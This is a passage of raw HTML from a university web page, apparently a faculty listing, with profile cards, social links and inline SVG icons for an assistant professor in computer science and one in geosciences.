2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n            <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg\" class=\"wp-image-1391 style-973-image style-local-182-c35-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c36\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c52-outer\">\n            <div data-colibri-id=\"182-c52\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c52 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c53\" class=\"d-block style-973 style-local-182-c53 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg\" class=\"wp-image-705 style-973-image style-local-182-c53-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c53-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c54\" class=\"h-global-transition-all h-heading style-974 style-local-182-c54 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c54\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c55\" class=\"h-text h-text-component style-975 style-local-182-c55 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c56\" class=\"h-text h-text-component style-976 style-local-182-c56 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c57\" class=\"style-977 style-local-182-c57 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c195-outer\">\n            <div data-colibri-id=\"182-c195\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c195 position-relative\">\n              